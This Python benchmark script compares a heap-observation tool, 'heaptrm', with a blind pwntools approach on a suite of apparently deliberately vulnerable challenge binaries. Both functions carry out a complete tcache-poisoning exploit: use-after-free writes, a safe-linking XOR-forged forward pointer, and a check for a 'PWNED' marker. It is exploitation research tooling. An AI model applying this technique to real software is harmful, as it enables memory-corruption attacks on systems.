File size: 8,037 Bytes
e1fab24
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
#!/usr/bin/env python3
"""
same_session_benchmark.py β€” The correct benchmark.

Both approaches run in the SAME process session:
  A: heaptrm session β€” observe addresses, compute exploit, execute in same session
  B: blind session β€” same binary, same protocol, but no heap observation

This tests: does structured heap observation enable exploitation that's
otherwise impossible? No LLM needed β€” the exploit logic is deterministic
given the addresses. The question is purely: can we GET the addresses?
"""

import subprocess
import json
import struct
import os
from pathlib import Path
from collections import defaultdict

ROOT = Path(__file__).parent.parent
SUITE = ROOT / "cve_tests" / "suite"
HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
TRIALS = 10


def heaptrm_session(binary: str, sc: int) -> bool:
    """Single heaptrm session: observe + exploit in same process."""
    proc = subprocess.Popen(
        [HEAPTRM, binary],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
        text=True
    )

    def cmd(action, data=""):
        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
        proc.stdin.flush()
        line = proc.stdout.readline()
        return json.loads(line) if line.strip() else {}

    try:
        # Setup: alloc 3, free 2
        cmd("send", f"1 0 {sc}\n")
        cmd("send", f"1 1 {sc}\n")
        cmd("send", f"1 2 {sc}\n")
        cmd("send", "4 0\n")
        cmd("send", "4 1\n")

        # OBSERVE β€” this is what heaptrm provides
        r = cmd("observe")
        if not r.get("heap"):
            cmd("quit"); return False

        chunks = r["heap"]["chunks"]
        freed = sorted([c for c in chunks if c["state"] == "freed"],
                       key=lambda c: int(c["address"], 16))
        allocated = sorted([c for c in chunks if c["state"] == "allocated"],
                          key=lambda c: int(c["address"], 16))

        if len(freed) < 2 or not allocated:
            cmd("quit"); return False

        # COMPUTE β€” deterministic given addresses
        chunk1_addr = int(freed[-1]["address"], 16)
        target_addr = int(allocated[-1]["address"], 16)
        xor_key = chunk1_addr >> 12
        poisoned = target_addr ^ xor_key
        fd_hex = struct.pack("<Q", poisoned).hex()[:16]

        # EXPLOIT β€” in same session
        cmd("send", f"2 1 {fd_hex}\n")
        cmd("send", f"1 3 {sc}\n")
        cmd("send", f"1 4 {sc}\n")
        cmd("send", "2 4 50574e454421210a\n")
        r = cmd("send", "3 2\n")
        cmd("quit")

        return r.get("output", "").find("50574e4544") >= 0

    except Exception:
        pass
    finally:
        try: proc.kill(); proc.wait(timeout=2)
        except: pass
    return False


def blind_session(binary: str, sc: int, config: dict) -> bool:
    """Same process, but no heap observation. Uses only binary output."""
    from pwn import process as pwn_process, p64, context
    context.log_level = "error"

    p = pwn_process(binary)
    try:
        def do(cmd):
            p.sendline(cmd.encode())
            return p.recvline(timeout=1).strip()

        r0 = do(f"1 0 {sc}")
        r1 = do(f"1 1 {sc}")
        r2 = do(f"1 2 {sc}")
        do("4 0")
        do("4 1")

        # Try to extract info from binary output
        addr0 = addr1 = addr2 = None
        leaked_fd = None

        # Check for address leaks in alloc output
        for r, name in [(r0, "0"), (r1, "1"), (r2, "2")]:
            if r and b"0x" in r:
                try:
                    a = int(r.split(b"0x")[1].split()[0], 16)
                    if name == "0": addr0 = a
                    elif name == "1": addr1 = a
                    elif name == "2": addr2 = a
                except: pass

        # Try UAF read
        p.sendline(f"3 1".encode())
        leak = p.recvline(timeout=1).strip()
        if leak and leak != b"DELETED" and leak != b"ERR" and len(leak) >= 16:
            try:
                leaked_fd = int(leak[:16], 16)
            except: pass

        # Compute based on available info
        poisoned = None
        if addr1 and addr2:
            poisoned = addr2 ^ (addr1 >> 12)
        elif leaked_fd and not addr1:
            # Decrypt fd with guessed key
            key = 0x555555559
            decrypted = leaked_fd ^ key
            if 0x555555550000 < decrypted < 0x555555570000:
                target = decrypted + 0xa0
                poisoned = target ^ key
        elif addr0 and not addr1 and not addr2:
            # Only first address β€” guess offsets
            addr1_guess = addr0 + 0x50
            addr2_guess = addr0 + 0xa0
            poisoned = addr2_guess ^ (addr1_guess >> 12)

        if poisoned is None:
            # Pure blind β€” try common offsets
            base = 0x555555559000
            for off in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550,
                        0x600, 0x650, 0x700]:
                c1 = base + off + 0x50
                tgt = c1 + 0x50
                test_poison = tgt ^ (c1 >> 12)
                do(f"2 1 {p64(test_poison).hex()[:16]}")
                do(f"1 3 {sc}")
                do(f"1 4 {sc}")
                do("2 4 50574e454421210a")
                result = do("3 2")
                if b"50574e4544" in result:
                    p.close()
                    return True
                # Wrong β€” must restart (tcache corrupted)
                p.close()
                return False

        do(f"2 1 {p64(poisoned).hex()[:16]}")
        do(f"1 3 {sc}")
        do(f"1 4 {sc}")
        do("2 4 50574e454421210a")
        result = do("3 2")
        p.close()
        return b"50574e4544" in result

    except:
        try: p.close()
        except: pass
        return False


def main():
    manifest = json.loads((SUITE / "manifest.json").read_text())

    print("=" * 80)
    print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)")
    print(f"{len(manifest)} challenges Γ— {TRIALS} trials")
    print("=" * 80)

    by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0})
    all_results = []

    for config in manifest:
        name = config["name"]
        binary = str(SUITE / name)
        if not Path(binary).exists():
            continue

        sc = 1
        ht = bl = 0
        for _ in range(TRIALS):
            if heaptrm_session(binary, sc): ht += 1
            if blind_session(binary, sc, config): bl += 1

        diff = config["difficulty"]
        by_diff[diff]["ht"] += ht
        by_diff[diff]["bl"] += bl
        by_diff[diff]["n"] += TRIALS

        delta = ht - bl
        marker = ">>>" if delta > TRIALS//2 else ">" if delta > 0 else "==" if delta == 0 else "<"
        info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}"
        print(f"  {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}")

        all_results.append({
            "name": name, "difficulty": diff,
            "heaptrm": ht, "blind": bl, "trials": TRIALS,
            **{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]}
        })

    print("\n" + "=" * 80)
    print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}")
    for diff in ["easy", "medium", "hard", "extreme"]:
        d = by_diff[diff]
        if d["n"] == 0: continue
        ht_pct = d["ht"] / d["n"] * 100
        bl_pct = d["bl"] / d["n"] * 100
        print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%")

    total_ht = sum(d["ht"] for d in by_diff.values())
    total_bl = sum(d["bl"] for d in by_diff.values())
    total_n = sum(d["n"] for d in by_diff.values())
    print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%")

    Path("bench").mkdir(exist_ok=True)
    with open("bench/same_session_results.json", "w") as f:
        json.dump(all_results, f, indent=2)


if __name__ == "__main__":
    main()